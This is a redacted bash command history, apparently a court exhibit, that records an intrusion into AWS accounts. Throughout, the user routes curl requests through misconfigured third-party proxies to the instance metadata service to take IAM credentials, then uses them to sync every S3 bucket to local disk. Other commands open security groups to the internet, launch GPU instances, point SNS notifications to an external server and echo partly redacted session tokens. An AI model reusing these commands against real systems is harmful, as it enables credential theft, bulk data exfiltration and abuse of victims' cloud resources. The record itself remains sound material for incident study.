1060  aws sts get-caller identity
1061  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p ████████████████/{} '&&'
cd ██████████████/{} '&&' aws s3 sync s3://{} .
1062  cd aws_sc
1064  cat ████████████████████████████.csv
1065  cat █████████████████████████
```

```
1085  cd ▮▮▮▮▮
1086  mv ▮▮▮▮▮▮▮▮▮ ./aws_scan
1087  cd ../aws_scan
1088  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.197.114.244:80
http://169.254.169.254/latest/meta-data/iam/info | awssession.sh
1089  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.197.114.244:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/▮▮▮▮▮▮ | awssession.sh
1091  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p ▮▮▮▮▮/{} '&&' cd
▮ ▮ ▮▮▮▮/{} '&&' aws s3 sync s3://{} .
1092  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p "▮▮▮▮▮/{}" '&&' cd
"▮▮▮▮/{}" '&&' aws s3 sync s3://{} .
1094  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
\"service_devops/{}\" '&&' cd \▮▮▮▮▮/{}\" '&&' aws s3 sync s3://{} .
1095  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p \"ec2_s3_role/{}\" '&&'
cd ▮▮▮▮▮/{}\" '&&' aws s3 sync s3://{} .
1096  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
\'▮▮▮▮▮/{}\" '&&' cd \▮▮▮▮▮/{}\" '&&' aws s3 sync s3://{} .
1098  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
'▮▮▮▮/$(echo {} '|' tr '\n' '_')\" '&&' cd \"▮▮▮▮▮$(echo {} '|' tr '\n' '_')" '&&' aws s3
sync s3://{} .
1099  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
"▮▮▮▮/$(echo {} '|' tr \'\n\' \'_\')\" '&&' cd \"▮▮▮▮/$(echo {} '|' tr \'\n\' \'_\')" '&&'
aws s3 sync s3://{} .
1101  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
'▮▮▮▮/$(echo {} \| tr \'\n\' \'_\')\" '&&' cd \"▮▮▮▮▮$(echo {} \| tr \'\n\' \'_\')" '&&' aws
s3 sync s3://{} .
1102  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
▮▮▮▮/\$(echo {} \| tr \'\n\' \'_\'\)\" '&&' cd \▮▮▮▮▮/\$(echo {} \| tr \'\n\' \'_\')" '&&'
aws s3 sync s3://{} .
1105  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
▮▮▮▮/\$(echo {} '|' tr \'\n\' \'_\')\" '&&' cd \"▮▮▮▮▮/\$(echo {} '|' tr \'\n\' \'_\')" '&&'
aws s3 sync s3://{} .
1106  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p '"▮▮▮▮▮/{}"' '&&'
cd '▮▮▮▮▮/{}"' '&&' aws s3 sync s3://{} .
1113  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
'▮▮▮▮▮/{}"' '&&' cd '▮▮▮▮▮/{}"' '&&' aws s3 sync s3://{} .
1115  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"▮▮▮▮▮'
\; mkdir -p '"$dir"' '&&' cd '"$dir"' '&&' aws s3 sync s3://{} .
1116  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"▮▮▮▮▮'
```

```
\; mkdir -p '"${dir}"' '&&' cd '"${dir}"' '&&' aws s3 sync s3://{} .
 1117  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='          /{}"'
\; mkdir -p '"${dir}"' '&&' cd '"${dir}"' '&&' pwd '&&' aws s3 sync s3://{} .
 1123  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='          /{}"'
\; mkdir -p \'"$dir"\' '&&' cd \'"$dir"\' '&&' aws s3 sync s3://{} .
 1124  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='          /{}"'
\; mkdir -p '"${dir\}"' '&&' cd '"${dir\}"' '&&' aws s3 sync s3://{} .
 1125  cd /mnt/export/erratic/aws_scan/
 1126  cd /mnt/export/erratic/aws_scan/
 1129  /mnt/export/erratic/aws_scan/
 1130  /mnt/export/erratic/aws_scan/
 1139  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir=''          /{}"'
\; mkdir -p \"${dir\}\" '&&' cd \"${dir\}\" '&&' aws s3 sync s3://{} .
 1140  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
              /{}"' \; mkdir -p \"${dir\}\" '&&' cd \"${dir\}\" '&&' aws s3 sync s3://{} .
 1148  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.239.113.195:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh
 1150  aws s3api list-bukets
 1152  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.154.211.231:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                      |
awssession.sh
 1154  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='                              "' \; mkdir -p \"${dir\}\" '&&' cd \"${dir\}\" '&&' aws s3 sync
s3://{} .
 1156  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.34.213.125:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh
 1160  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.214.49.137:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh
 1163  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.123.235:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
 1164  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.123.235:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
awssession.sh
 1168  awssession.sh
 1177  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.250.92.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/              |
awssession.sh
 1179  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.230.94.207:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
```

```
awssession.sh
 1181  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.230.94.207:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/               | awssession.sh
 1185  grep -r "ami-id" | tr '.' ' ' | tr ':' ' ' | awk '{print $1"."$2"."$3"."$4":"$6}' | grep  -v 443 |
parallel --tag --verbose curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://35.164.142.129:3128
http://                    amazonaws.com/
.2.1.200624.0/lib/UserDataScript.sh
 1186  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3128
http://                    .amazonaws.com/
.2.1.200624.0/lib/UserDataScript.sh
 1187  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129
'https://

 1188  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129

 1209  mv                  ~/aws_scan
 1210  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='"              '{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 1263  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.161.43.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/               | awssession.sh
 1270  aws ec2 describe-instances --region us-east-1 > ../../
 1271  aws ec2 describe-instances --region us-east-2 > ../../
 1272  aws ec2 describe-instances --region us-west-1 > ../../
 1273  aws ec2 describe-instances --region us-west-2 > ../../
 1542  cp ../aws_scan/scan_for_metadata.sh .
 1543  ls ../../aws_scan/
 1544  cp ../aws_scan/ports.txt .
 1545  cp ../aws_scan/https_ports.txt .
 1777  aws ec2 create-key-pair default2 --region us-west-2 --key-name default2
 1778  aws ec2 create-key-pair --region us-west-2 --key-name default2
 1779  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-idsaw          0db7
--instance-initiated-shutdown-behavior terminate --key-name default2
```

```
1781  aws ec2 describe-instances --region us-west-2
1782  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-        0e791 --associate-public-ip-address --security-group-id sg-     66a5
--instance-initiated-shutdown-behavior terminate --key-name default2
1797  aws ec2 create-key-pair --region ap-southeast-2 --key-name default
1801  aws ec2 run-instances --region ap-southeast-2 --instance-type t3.micro --count 1 --image-id
ami-           1423 --associate-public-ip-address --security-group-ids sg-     00c5
--instance-initiated-shutdown-behavior terminate --key-name default
1803  aws ec2 describe-security-groups --region ap-southeast-2
1804  aws ec2 authorize-security-group-ingress --group-id sg-     b0c5 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region ap-southeast-2
1834  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.203.180.4:443
http://169.254.169.254/latest/meta-data/iam/security-credentials.              | awssession.sh
1836  aws ssm describe-activations
1837  aws ssm describe-instance-associations-status
1838  aws ssm describe-available-patches
1843  aws ec2 describe-instances --region us-east-1 >
1845  aws ec2 describe-instances --region us-east-1 |  jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceType' | sort | uniq -c | sort -n
1846  aws ec2 create-key-pair --region eu-north-1 --key-name default
1847  aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id
ami-           1423 --associate-public-ip-address --security-group-ids sg-     00c5
--instance-initiated-shutdown-behavior terminate --key-name default
1849  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.33.58.7:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
1851  aws ec2 describe-instances --region us-west-1
1852  aws s3 list-buckets
1855  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.233.67.216:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
1857  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"              /{}"'
\; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
1861  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.214.50.238:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
1863  aws describe-instances
1867  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.164.114.241:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
1869  awssession.sh
1879  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

```
 1880  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129
http://169.254.169.254/latest/meta-data/iam/security-credentials/                          |
awssession.sh
 1883  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.199.114.150:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/                          |
awssession.sh
 1886  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.58.159.44:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/                    | awssession.sh
 1891  aws ec2 describe-tags --region us-east-2 --filters "Name=resource-id,Values=i-             593a"
 1892  aws ec2 describe-tags --region us-east-2 --filters "Name=resource-id,Values=i-            593a" >

 1893  aws s3api --region us-east-1 list-buckets
 1895  aws sns list-topics --region $S3_REGION | /usr/bin/jq -r ".Topics[] | select(.TopicArn).TopicArn" |
grep $SNS_TOPIC
 1896  aws sns list-subscriptions --region $S3_REGION
 1897  aws ec2 authorize-security-group-ingress --group-id sg-      b0c5 --protocol tcp --port 1630 --cidr
0.0.0.0/0 --region ap-southeast-2
 1899  sns_topic_arn=$(aws sns list-topics --region $S3_REGION | /usr/bin/jq -r ".Topics[] |
select(.TopicArn).TopicArn" | grep $SNS_TOPIC)\n
 1900  aws sns subscribe --region $S3_REGION --topic-arn $sns_topic_arn --protocol http
--notification-endpoint http://13.239.116.146:1630
 1901  aws sns subscribe --region $S3_REGION --topic-arn
"arn:aws:sns:us-east-1:                          ' --protocol http --notification-endpoint
http://13.239.116.146:1630
 1902  aws sns subscribe --region $S3_REGION --topic-arn "arn:aws:sns:us-east                       "
--protocol http --notification-endpoint http://13.239.116.146:1630
 1912  aws s3 sync s3:/                              .
 1949  aws s3api list-objects --bucket $BUCKET
 2085  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://23.22.9.234:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/                     | awssession.sh
 2088  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='"                                            e8d7/{}"' \; mkdir -p \"$\{dir\}\" '&&'
cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 2089  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.204.53.206:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                | awssession.sh
 2093  aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | xargs -i -t aws ec2 describe-instance-attribute --instance-id {} --attribute userData
 2132  mysql -u developer -h                                            n
```

```
2148  curl
https://s3.
2162  curl
https://s3.

2163  curl
https://s3.

2362  cd aws_scan/
3386  curl https://ip-ranges.amazonaws.com/ip-ranges.json | json '.[]' | less
3387  curl "https://ip-ranges.amazonaws.com/ip-ranges.json" | json '.[]' | less
3388  curl https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.[]' | less
3389  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.[]| .[]' | less
3390  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.[]| ' | less
3391  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.[]' | less
3392  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] ' |
less
3393  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '' | less
3394  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2" | .ip_prefix) ' | less
3395  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2") ' | less
3396  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2" | .[]) ' | less
3397  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | |
select(.service == "EC2" | .[]) ' | less
3398  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes |
select(.service == "EC2" | .[]) ' | less
3399  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2") | .[] ' | less
3400  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2") | .ip_prefix ' | less
3401  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip_prefix ' | less
3483  less ~/.aws/credentials
3528  curl
https://s3.

3534  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.69.113.132.:3128
```

608-014

```
      http://169.254.169.254/latest/meta-data/iam/security-credentials/
 3535  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.69.113.132.:3128
      http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
      awssession.sh
 3845  curl -vvv -L --proxy-insecure --proxy https://18.195.92.229:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
 3849  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
      dir='                   /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 3860  nslookup
 3861  aws ec2 describe-instances --profile
 3862  aws ec2 --profile       describe-instances
 3863  aws ec2 --profile       describe-instances --region us-east-1
 3864  aws --profile       get-caller-identity
 3865  aws --profile       sts get-caller-identity
 3866  aws --profile       ec2 create-key-pair --key-name default
 3867  aws --profile       ec2 create-key-pair --key-name default --region ap-northeast-1
 3887  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.55.240.202:80
      http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials,          |
      awssession.sh
 3910  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.51.130.133:3128
      http://169.254.169.254/latest/meta-data/iam/security-credentials/
                      | awssession.sh
 3914  aws ec2
 3919  cat ~/.local/bin/awssession.sh
 3930  curl --proxy 52.55.240.202:80 -L -vvv
      http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/        |
      awssession.sh
 3935  aws ec2 --region us-east-1 describe-instances --instance-ids i-            8f91
 3936  aws              describe-stack-resource
 3937  aws              list-stacks
 3938  aws ec2 --help
 3939  aws ec2 help
 4161  aws ec2 describe instances --region ap-souteast-2
 4162  aws ec2 describe instances --region ap-southeast-2
 4163  aws ec2 authorize-security-group-ingress --group-id sg-      0c5 --protocol udp --port 514 --cidr
      0.0.0.0/0 --region ap-southeast-2
 4164  aws ec2 authorize-security-group-ingress --group-id sg-      0c5 --protocol udp --port 443 --cidr
      0.0.0.0/0 --region ap-southeast-2
 4167  aws ec2 authorize-security-group-ingress --group-id sg-      0c5 --protocol udp --port 42 --cidr
```

608-015

```
0.0.0.0/0 --region ap-southeast-2
 4168  aws ec2 authorize-security-group-ingress --group-id sg-       b0c5 --protocol tcp --port 42 --cidr
0.0.0.0/0 --region ap-southeast-2
 4223  curl aws sts get-caller-identity
 4228  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='                              KV0K/{}"' \; mkdir -p \"$\{dir\}\" '&&' cd
\"$\{dir\}\" '&&' aws s3 sync s3://{} .
 4229  aws ec2 authorize-security-group-ingress --group-id sg-       b641 --protocol tcp --port 22 --cidr
0.0.0.0/0
 4233  curl --proxy-insecure --proxy https://52.198.201.173:443 -L
http://169.254.169.254/latest/meta-data/iam/security-credentials/
              | awssession.sh
 4234  curl --proxy-insecure --proxy https://52.198.201.173:443 -L
http://169.254.169.254/latest/meta-data/iam/security-credentials/
              | awssession.sh export AWS_SECRET_ACCESS_KEY="                              uG3Hq"
 4238  aws ec2 create-key-pair --region eu-west-1
 4241  aws ec2 authorize-security-group-ingress --group-id sg-       af30 --protocol tcp --port 22 --cidr
0.0.0.0/0
 4242  aws ec2 authorize-security-group-ingress --group-id sg-       af30 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1
 4243  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 3 --image-id
ami-            la80 --associate-public-ip-address --security-group-ids sg-      af30
--instance-initiated-shutdown-behavior terminate
 4244  aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 3 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-      af30
--instance-initiated-shutdown-behavior terminate
 4245  aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
ami-            34a80 --associate-public-ip-address --security-group-ids sg-      af30
--instance-initiated-shutdown-behavior terminate
 4246  aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 3 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-      af30
--instance-initiated-shutdown-behavior terminate
 4247  aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-      af30
--instance-initiated-shutdown-behavior terminate
 4248  aws --profile            describe-instances --region us-west-2 | jq -r '.Reservations | .[] |
.Instances | .[] | .PublicIpAddress'
 4255  aws sts get-caller-identityy
 4256  aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
```

```
      .InstanceId' | tr '\n' ' '
  4257  aws ec2 terminate-instances --region-eu-west-1 --instance-ids i-            282a
i-(         2e5f i-          552d i-            cfb9 i-            a945 i-                99bb
  4258  aws ec2 terminate-instances --region eu-west-1 --instance-ids i-            282a
i-           2e5f i-          552d i-            cfb9 i-            a945 i-                9bb1
  4259  aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | xargs -i -t aws ec2 terminate-instances --region-eu-west-1 --instance-ids {}
  4260  aws ec2 delete-key-pair --region eu-west-1 --key-name default
  4261  aws ec2 create-key-pair --region eu-west-1 --key-name default
  4266  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
ami-              4a80 --associate-public-ip-address --security-group-ids sg      af30
--instance-initiated-shutdown-behavior terminate
  4267  aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | xargs -i -t aws ec2 terminate-instances --region eu-west-1 --instance-ids {}
  4268  aws ec2 describe-instances --region eu-west-1 | less
  4269  aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
ami-              4a80 --associate-public-ip-address --security-group-ids sg-      af30
--instance-initiated-shutdown-behavior terminate --key-name default
  4270  aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id
ami-              4a80 --associate-public-ip-address --security-group-ids sg-      af30
--instance-initiated-shutdown-behavior terminate --key-name default
  4271  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
ami-              4a80 --associate-public-ip-address --security-group-ids sg-      af30
--instance-initiated-shutdown-behavior terminate --key-name default
  4272  aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
  4286  curl --proxy http://63.35.93.108:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/                      |
awssession.sh
  4288  curl --proxy http://52.7.126.48:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/                      |
awssession.sh
  4291  curl --proxy http://52.7.126.48:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/                         | awssession.sh
  4293  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir=''                       /{}"' \; mkdir -p \"${dir\}\" '&&' cd \"${dir\}\" '&&' aws s3 sync s3://{} .
  4294  cd aws_scan/metadata-remote
  4302  curl -L --proxy http://52.83.253.74:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/                    | awssession.sh
```

608-017

```
 4311  curl --proxy-insecure --proxy https://34.249.66.243:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
awssession.sh
 4315  curl --proxy-insecure --proxy 52.65.90.185:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/        | awssession.sh
 4323  curl -Lsk --fail --proxy-insecure --proxy https://52.65.90.185:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/        | awssession.sh
 4328  curl -Lsk --fail --proxy-insecure --proxy https://34.195.6.247:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh
 4426  echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-03-22T10:03:37Z",\n  "Type" : "          ",\n
"AccessKeyId" : "                   276W","SecretAccessKey" :
"                   GSdK",\n  "Token" :
"FQoGZXIvYXdzEPP/////////wEaDP3Q0E/t0/YXpvvmrSLBA0xq0wwZfepTLSQsRuT54lE1r8Bduf1P4i21CwiznOikvJaF7Dem6/Cyb/
C7webUgjgXUqEbYoxeB2RuZ0q8mMFJxEknSAg5WpWw9M+nblE8YTimsdHwHwsW9dV/7DrlVBTiuOMBlox/MQwIAojh4ppWt6omq9OZwhXWq
DETiIg8aIFes24wguVXxkuXSrk1Y6uVUFXWPLGTSYiPU82Lp8ARyf9sfCxlhrAqlqUDaQOqgT+d6wnd/bkbgSj/eJp1lzH09HDhh48rjdFH
jbtJ+vnrR3NoBtUPFpcWkwbb00ySKGaq6RKGQmwFKTCMZd5H8eI1QjHIN1/pDRw7gy8S2cQ6RSBJp++FwwviQCIz86rV9eKV8lqwhxrT+yB
Bc2MW/K9DIJFEtm5wg1XbQI4c7A5uSIAxg3lVL3Nd0x/TU54eLhXKXO6zqwiLZLChHJD7yY00ZnjBpvnZy+4PUZEscdwl04G6bS6br/QA0E
1Ms3khSvcR3zikZu1zK1bBClrd4rOviBGz126qe3NeCbTok/cCnocYPDUyqAGVzxSbEY6tx3VfoRY4QVvA6rA4r5Sa1gZRprceU9MuAAlXC
z809jFxKIPm0uQF",\n  "Expiration" : "2019-03-22T16:20:46Z"\n}' | awssession.sh
 4428  aws sts get-caller-identiy
 4429  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='                          {}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{}
.
 4451  echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-03-22T11:03:58Z",\n  "Type" : "          ",\n
"AccessKeyId" : "                 NTUB","SecretAccessKey" :
"                 IUEo",\n  "Token" :
"FQoGZXIvYXdzEPT/////////wEaDFcw0apGj9mT+DxT5iLBA8XIF8YHtV7GznJCfWAMAYWfCvHnt+IqPQYWUBtT5eWgBNHS5HVVybV/Iu
m4r/0lPhoxfNdYmdJsiS04M+s2OVofU59ki5qZcYpEZtrs2ax6DOwdp3OjiP8n4KUMSNO9meT1QgyoSvq5Cbe5PLx3jgkfHbd5N34eP3IsC
gdqzdR5v+AnnXB6xJNS31MKa73uPQyjCHAXQ79A5tSywv1Qp22q/hxYnkPg2VDyaC3BdhXgingT7ArrF0ZBS6YjHMeGrHJmGWd6X+gsp3b9
PyysRUT17pv4C1L6x2RcTxJK7w/ypCmksTm0fgrdRbUcwlrA4PB4LOkmolwy8Vt3jIeuLPf0xNIdlY4LVMNOXaY8Ti2XHbzcM8ge02Il9Ta
0RhwcsljXQCinpc04jhCLkVPR6Ba64yFT4lh59jxGx90uz7uW/ZzvQJYKh7DA4r4wJIESaXNcBW437ctGMdwVY/6GSur4k43Qn54qcnVfpL
6yDt7xPwLB9sB8Nriy1UadH10CysxreZZ9QSXNTlDiYvZQIVDGWo5PlcwNwYWU+TdjasX81BM7qYZxsuAITh1we+QAzSopupdCOstDEYd4B
AifLmoaKJOC0+QF",\n  "Expiration" : "2019-03-22T17:18:40Z"\n}' | awssession.sh
 4453  aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
| .Tags'
 4454  aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
| [.PublicIpAddress, .Tags]' | less
 4457  aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
| [.PublicIpAddress, .PrivateIpAddress, .Tags]' | less
```

```
4458  aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
'
4459  aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
' | less
4469  aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
| .PrivateIpAddress' | less
4470  aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
| .PrivateIpAddress' | parallel curl
4471  aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
| .PrivateIpAddress' | parallel curl -Lsk --fail --proxy-insecure --proxy http://54.249.29.154:80
http://{}:9000
4480  curl -Lsk --fail --proxy-insecure --proxy https://34.234.188.25:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awsession.sh
4485  less awscli.conf
4524  aws organizations
4525  aws organizations help
4526  less
./                                                  /Unsaved/2018/09/17/

4527  less


4618  less
4619  less
4644  aws s3api sync
4645  aws s3 sync
4646  aws s3 sync --help
4647  aws s3 sync
4648  aws s3 sync help
4657  echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-03-22T17:07:39Z",\n  "Type" : "          ",\n
"AccessKeyId" : "/               6KNF",\n  "SecretAccessKey" :
"                          PNOa",\n  "Token" :
```

"FQoGZXIvYXdzEPv//////////wEaDO61OtGs+VmBMYgRfiK9A0YN+3CnnnDF2jhOCkrSS5CRUCpolcqx/Ihn1YD4FP2rtAGOYujOhBQM4c
Pt0IB8N0sXu/wGMfWJ8k4JPFe8Pvr3oPH9dvaX5bgml0gvZ2Y6I8Ulh7+xtScEpNS88ikNBgf9UIouOcW+s4omAfmM+ffzd489SHoUySujg
pyP+FDor09EoQZxxcvonBXSmXNk6vScIMVRqoVmV862lM4iEzZWKDmLMGlWi9Sa/G2QUZoz2ekgIMH2sRXkDIlUqd/TgcI6T61sm2YeRgct
